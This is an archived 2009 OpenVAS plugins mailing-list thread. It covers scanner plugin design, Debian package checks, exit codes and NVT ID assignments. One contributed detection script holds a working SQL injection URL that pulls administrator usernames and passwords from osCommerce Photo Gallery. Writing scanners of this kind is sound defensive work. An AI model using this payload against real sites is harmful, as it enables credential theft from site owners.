From timb at nth-dimension.org.uk Mon Feb 2 01:28:22 2009 From: timb at nth-dimension.org.uk (Tim Brown) Date: Mon, 2 Feb 2009 00:28:22 +0000 Subject: [Openvas-plugins] [Openvas-discuss] Question about plugin 11808 In-Reply-To: References: <5792267e0901191508y1c1fe4fbg47e682f6909a6d6@mail.gmail.com> Message-ID: <200902020028.24304.timb@nth-dimension.org.uk> The problem with this plugin is that it checks for the vulnerability by fingerprinting the service (not by checking that the patch has been applied). There are a number of other scanners out there which also check for this issue but without substantial testing I'm not sure if we can improve the check. Tim -- Tim Brown From bchandra at secpod.com Fri Feb 6 07:30:50 2009 From: bchandra at secpod.com (Chandrashekhar B) Date: Fri, 6 Feb 2009 12:00:50 +0530 Subject: [Openvas-plugins] [Openvas-discuss] Question about plugin 11808 In-Reply-To: <200902020028.24304.timb@nth-dimension.org.uk> References: <5792267e0901191508y1c1fe4fbg47e682f6909a6d6@mail.gmail.com> <200902020028.24304.timb@nth-dimension.org.uk> Message-ID: <40437D3EA10D4587A653A0CF946063FC@bchandra> -----Original Message----- From: Tim Brown [mailto:timb at nth-dimension.org.uk] Sent: Monday, February 02, 2009 5:58 AM To: openvas-plugins at wald.intevation.org Cc: Chandrashekhar B; 'Eric Gearhart' Subject: Re: [Openvas-plugins] [Openvas-discuss] Question about plugin 11808 > The problem with this plugin is that it checks for the vulnerability by > fingerprinting the service (not by checking that the patch has been > applied). Updated this plugin to check for the latest MS bulletins that superseded. > There are a number of other scanners out there which also check for this > issue but without substantial testing I'm not sure if we can improve the > check. Thanks, Chandra. From jan-oliver.wagner at intevation.de Fri Feb 13 23:00:46 2009 From: jan-oliver.wagner at intevation.de (Jan-Oliver Wagner) Date: Fri, 13 Feb 2009 23:00:46 +0100 Subject: [Openvas-plugins] Improving gather-packages-list.nasl Message-ID: <200902132300.47132.jan-oliver.wagner@intevation.de> Hello, I've spend some time with gather-packages-list.nasl and I think it could be improved in some ways: * In case a "/etc/debian_version" is found on the target system, but the contents is not matched, then a confusing note is issued "System identifier unknown: "', uname, ' ..." So, the uname. Allthough it is already clear that it is a Debian. This could allow for short-cuts, avoiding unecessary comparisons. * Instead of e.g. rls = ssh_cmd(socket:sock, cmd:"cat /etc/debian_version"); wouldn't it be better to apply rls = ssh_cmd(socket:sock, cmd:"[ -f /etc/debian_version ] && cat /etc/debian_version") and then check for empty strings to avoid unnecessary comparisons? * For DSA's there quite formal elements like For the testing (lenny) distribution these problems have been fixed in version 1.8.2.dfsg-3+lenny1. For the unstable (sid) distribution these problems have been fixed in version 1.8.2.dfsg-4. It would be absolutely great if these tests could be added as many people use "almost-stable" releases already in production mode. Sid-Support would be great as well. Any thoughts? Best Jan -- Dr. Jan-Oliver Wagner | ++49-541-335 08 30 | http://www.intevation.de/ Intevation GmbH, Neuer Graben 17, 49074 Osnabr?ck | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner From jan-oliver.wagner at intevation.de Fri Feb 13 23:52:12 2009 From: jan-oliver.wagner at intevation.de (Jan-Oliver Wagner) Date: Fri, 13 Feb 2009 23:52:12 +0100 Subject: [Openvas-plugins] Improving pkg-lib-deb.inc Message-ID: <200902132352.12532.jan-oliver.wagner@intevation.de> Hi, the method "isdpkgvuln" is typically used several times by a local security check. In case "ssh/login/release" is not the one seeking for, shouldn't it be possible to avoid further tests on this? Best Jan -- Dr. Jan-Oliver Wagner | ++49-541-335 08 30 | http://www.intevation.de/ Intevation GmbH, Neuer Graben 17, 49074 Osnabr?ck | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner From jan-oliver.wagner at intevation.de Sat Feb 14 00:03:32 2009 From: jan-oliver.wagner at intevation.de (Jan-Oliver Wagner) Date: Sat, 14 Feb 2009 00:03:32 +0100 Subject: [Openvas-plugins] exit(0) at end useless? Message-ID: <200902140003.32723.jan-oliver.wagner@intevation.de> Hi, I wonder wether is itsn't useless to have a exit(0) at the end of scripts as it is the same as just ending the script. At least over 60 NVTs do so. Any opinions? Best Jan -- Dr. Jan-Oliver Wagner | ++49-541-335 08 30 | http://www.intevation.de/ Intevation GmbH, Neuer Graben 17, 49074 Osnabr?ck | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner From eric at nixwizard.net Sat Feb 14 00:11:16 2009 From: eric at nixwizard.net (Eric Gearhart) Date: Fri, 13 Feb 2009 16:11:16 -0700 Subject: [Openvas-plugins] exit(0) at end useless? In-Reply-To: <200902140003.32723.jan-oliver.wagner@intevation.de> References: <200902140003.32723.jan-oliver.wagner@intevation.de> Message-ID: <5792267e0902131511u425c4cfbva3a5f9d91df85e4@mail.gmail.com> On Fri, Feb 13, 2009 at 4:03 PM, Jan-Oliver Wagner wrote: > Hi, > > I wonder wether is itsn't useless to have a exit(0) at the end of scripts as > it is the same as just ending the script. At least over 60 NVTs do so. > > Any opinions? I thought exit(0) was "good form" in scripts... it basically explicitly states "exit cleanly, with no errorlevel state" http://www.hsrl.rutgers.edu/ug/shell_help.html looks pretty accurate... see the "Exit status" section "All Unix utilities should return an exit status...A non-zero exit status indicates an error condition of some sort while a zero exit status indicates things worked as expected. " -- Eric http://nixwizard.net From lists at securityspace.com Sat Feb 14 02:59:39 2009 From: lists at securityspace.com (Thomas Reinke) Date: Fri, 13 Feb 2009 20:59:39 -0500 Subject: [Openvas-plugins] Improving pkg-lib-deb.inc In-Reply-To: <200902132352.12532.jan-oliver.wagner@intevation.de> References: <200902132352.12532.jan-oliver.wagner@intevation.de> Message-ID: <4996258B.4010904@securityspace.com> No doubt there are more efficient ways of handling this. (You have to remember though, a given test may include checks for multiple releases.) One could, however, wrapper within the main body of the lsc all checks for a given release in an if-then block so that it was only executed if the host was identified running that release. Better yet (and probably easier to do, and somewhat more clean while limiting changes), would be to tag a given distribution's LSCs with a unique kb entry (a simple boolean, within gather-package-list.nasl) and make the entire script have a "script_require_keys(' Hi, > > the method "isdpkgvuln" is typically used several times by a local security check. > In case "ssh/login/release" is not the one seeking for, shouldn't it be possible to avoid further tests on this? > > Best > > Jan From lists at securityspace.com Sat Feb 14 03:00:44 2009 From: lists at securityspace.com (Thomas Reinke) Date: Fri, 13 Feb 2009 21:00:44 -0500 Subject: [Openvas-plugins] Improving gather-packages-list.nasl In-Reply-To: <200902132300.47132.jan-oliver.wagner@intevation.de> References: <200902132300.47132.jan-oliver.wagner@intevation.de> Message-ID: <499625CC.90103@securityspace.com> Jan-Oliver Wagner wrote: > Hello, > > I've spend some time with gather-packages-list.nasl and I think it could > be improved in some ways: I've tried to minimize my time in there, and it shows :( > > * In case a "/etc/debian_version" is found on the target system, but > the contents is not matched, then a confusing note is issued > "System identifier unknown: "', uname, ' ..." > So, the uname. Allthough it is already clear that it is a Debian. > This could allow for short-cuts, avoiding unecessary comparisons. Yup. > > * Instead of e.g. > rls = ssh_cmd(socket:sock, cmd:"cat /etc/debian_version"); > wouldn't it be better to apply > rls = ssh_cmd(socket:sock, cmd:"[ -f /etc/debian_version ] && cat /etc/debian_version") > and then check for empty strings to avoid unnecessary comparisons? Yup. > > * For DSA's there quite formal elements like > For the testing (lenny) distribution these problems have been fixed in version 1.8.2.dfsg-3+lenny1. > For the unstable (sid) distribution these problems have been fixed in version 1.8.2.dfsg-4. > It would be absolutely great if these tests could be added as many people > use "almost-stable" releases already in production mode. > Sid-Support would be great as well. > > Any thoughts? This one is a bit tougher, and I'll have to admit we haven't taken a real close look at it. My concern would be to offer coverage of a release, but find out that the coverage is incomplete. Things like bugs that aren't fixed timely (because the distribution isn't considered production ready by the release team). Or bugs that are fixed, but advisories aren't issued (we could go straight to the repositories, but then wouldn't be able to determine the difference between a bug fix and a security fix). To be honest, I won't quibble with people using lenny (in fact, we do because it is _relatively_ stable and offered great virtualization support via kvm.) BUT BUT BUT - I don't feel guilty in not offering security checks for a release that the release team very clearly is indicating is not production quality and is not being maintained to production quality standards for security issues. Just my $0.02 worth. Thomas From michael.wiegand at intevation.de Mon Feb 16 08:56:36 2009 From: michael.wiegand at intevation.de (Michael Wiegand) Date: Mon, 16 Feb 2009 08:56:36 +0100 Subject: [Openvas-plugins] Improving pkg-lib-deb.inc In-Reply-To: <4996258B.4010904@securityspace.com> References: <200902132352.12532.jan-oliver.wagner@intevation.de> <4996258B.4010904@securityspace.com> Message-ID: <20090216075636.GA14767@intevation.de> * Thomas Reinke [14. Feb 2009]: > Better yet (and probably easier to do, and somewhat more clean while > limiting changes), would be to tag a given distribution's LSCs with > a unique kb entry (a simple boolean, within gather-package-list.nasl) > and make the entire script have a > "script_require_keys(' that the daemon won't even launch the script if the distribution > doesn't match. (Now that I think of it, I'm embarassed that we > didn't do that earlier.) Yes, I think this is a good idea. We could set a key like "ssh/login/distribution/debian". It might also be worth considering to split OS/distro detection and package gathering. The information regarding the remote OS/distro might be useful for other NVTs/LSCs as well, even if the don't gather package information. This separation would allow for a more generalized OS detection and could possibly use information gathered by nmap or similar tools in the future. It would also make gather-package-list a lot leaner since it would have to bother with doing OS detection itself. The only downside I can think of is that this might require an additional ssh connection. What do you think, would this be useful? Regards, Michael -- Michael Wiegand | OpenPGP key: D7D049EC | http://www.intevation.de/ Intevation GmbH, Neuer Graben 17, 49074 Osnabr?ck | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 206 bytes Desc: not available Url : http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090216/55364e9f/attachment.pgp From michael.wiegand at intevation.de Mon Feb 16 09:37:16 2009 From: michael.wiegand at intevation.de (Michael Wiegand) Date: Mon, 16 Feb 2009 09:37:16 +0100 Subject: [Openvas-plugins] exit(0) at end useless? In-Reply-To: <200902140003.32723.jan-oliver.wagner@intevation.de> References: <200902140003.32723.jan-oliver.wagner@intevation.de> Message-ID: <20090216083716.GB14767@intevation.de> * Jan-Oliver Wagner [14. Feb 2009]: > Hi, > > I wonder wether is itsn't useless to have a exit(0) at the end of scripts as > it is the same as just ending the script. At least over 60 NVTs do so. Looking at the code (nasl_do_exit in openvas-libnasl/nasl/nasl_misc_funcs.c) I would guess I does not make a difference aside from explicitly setting the return value to 0. But as Eric said, I think it would be good style for the NASL scripts to use the return value to let the world know what happened to them even if the don't find anything newsworthy. Even an exit(0) would be good if it signified "NVT ran okay, did not find a vulnerability". Regards, Michael -- Michael Wiegand | OpenPGP key: D7D049EC | http://www.intevation.de/ Intevation GmbH, Neuer Graben 17, 49074 Osnabr?ck | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 206 bytes Desc: not available Url : http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090216/6e82f19f/attachment.pgp From meyer at strato-rz.de Thu Feb 19 12:43:05 2009 From: meyer at strato-rz.de (Michael Meyer) Date: Thu, 19 Feb 2009 12:43:05 +0100 Subject: [Openvas-plugins] [Plugin] osCommerce Photo Gallery SQL Injection Vulnerabillity Message-ID: <20090219114305.GA3605@m2.homelinux.org> Hi, Photo Gallery for osCommerce is prone to SQL Injection vulnerabillity in gallery_process.php. This Plugin will detect this issue. This is my first plugin. Therefore, it could be that there are better ways to make it. script_id has to be filled... Micha -------------- next part -------------- ############################################################################### # OpenVAS Vulnerability Test # $Id$ # # osCommerce Photo Gallery SQL-Injection Detection # # Authors: # Michael Meyer # # Copyright: # Copyright (c) 2009 Michael Meyer # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2 # (or any later version), as published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. ############################################################################### if (description) { script_id(); script_version ("1.0"); script_name(english:"osCommerce Photo Gallery SQL Injection Vulnerabillity"); desc["english"] = " Overview: This host is running Photo Gallery for osCommerce which is prone to SQL Injection vulnerabillity in gallery_process.php. Vulnerability Insight: Input passed to the parameters in gallery_process.php are not properly sanitised before being used in the SQL queries. Impact: Successful exploitation will allow the attacker to acces the whole Database. Affected Software/OS: Photo Gallery (http://oscommerce-photo-gallery.micrographx.be) <= version 0.6 Solution: Edit gallery_process.php and change all occurrences of $_GET['cID'] to (int)$_GET['cID'] and all occurrences of $_GET['pID'] to (int)$_GET['pID']. Then, at the top of gallery_process php, search for: require('includes/application_top.php'); require(DIR_WS_LANGUAGES . $language . '/gallery_user.php'); and change to: require('includes/application_top.php'); if (!tep_session_is_registered('customer_id')) { tep_redirect(tep_href_link(FILENAME_LOGIN, '', 'SSL')); } require(DIR_WS_LANGUAGES . $language . '/gallery_user.php'); Risk factor : Medium"; script_description(english:desc["english"]); script_summary(english:"Determine if Photo Gallery for osCommerce is vulnerable to SQL Injection"); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2009 Michael Meyer"); script_dependencie("find_service.nes", "http_version.nasl"); script_require_ports("Services/www", 80); script_exclude_keys("Settings/disable_cgi_scanning"); exit(0); } include("http_func.inc"); include("http_keepalive.inc"); port = get_http_port(default:80); if(!get_port_state(port))exit(0); if(!can_host_php(port:port)) exit(0); dir = make_list("/catalog","/osc","/shop",cgi_dirs()); foreach d (dir) { url = string(d, "/gallery_process.php?edit=yes&pID=0%20union%20select%20user_name%20as%20title,%20user_password%20as%20description%20from%20administrators%20&cID=0"); req = http_get(item:url, port:port); buf = http_keepalive_send_recv(port:port, data:req, bodyonly:1); if( buf == NULL ) exit(0); if(egrep(pattern:".*union select user_name as title, user_password as description from administrators.*", string: buf) || egrep(pattern:".*Table.*administrators.*doesn't exist.*", string: buf) # old versions of osc doesn't have table administrators ) { security_warning(port:port); exit(0); } } From michael.wiegand at intevation.de Mon Feb 23 12:48:03 2009 From: michael.wiegand at intevation.de (Michael Wiegand) Date: Mon, 23 Feb 2009 12:48:03 +0100 Subject: [Openvas-plugins] ID block 100NNN assigned to Michael Meyer (mime) Message-ID: <20090223114802.GA14147@intevation.de> Hello, For your information: I have assigned the ID block 100NNN to Michael Meyer (mime on IRC) since he has already contributed an NVT and plans to contribute additional NVTs. AFAICT, this block was empty beforehand and this assignment does not conflict with existing NVTs. I have updated http://www.openvas.org/openvas-oids.html accordingly. Please let me know if you have any questions or suggestions regarding my assignment. Regards, Michael -- Michael Wiegand | OpenPGP key: D7D049EC | http://www.intevation.de/ Intevation GmbH, Neuer Graben 17, 49074 Osnabr?ck | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 206 bytes Desc: not available Url : http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090223/419daaf2/attachment.pgp From michael.wiegand at intevation.de Tue Feb 24 14:29:53 2009 From: michael.wiegand at intevation.de (Michael Wiegand) Date: Tue, 24 Feb 2009 14:29:53 +0100 Subject: [Openvas-plugins] ID block 101NNN assigned to Christian Eric Edjenguele Message-ID: <20090224132953.GE16112@intevation.de> Hello, For your information: I have assigned the ID block 101NNN to Christian Eric Edjenguele since he is planning to contribute NVTs. AFAICT, this block was empty beforehand and this assignment does not conflict with existing NVTs. I have updated http://www.openvas.org/openvas-oids.html accordingly. Please let me know if you have any questions or suggestions regarding my assignment. Regards, Michael -- Michael Wiegand | OpenPGP key: D7D049EC | http://www.intevation.de/ Intevation GmbH, Neuer Graben 17, 49074 Osnabr?ck | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 206 bytes Desc: not available Url : http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090224/3b84ebdf/attachment.pgp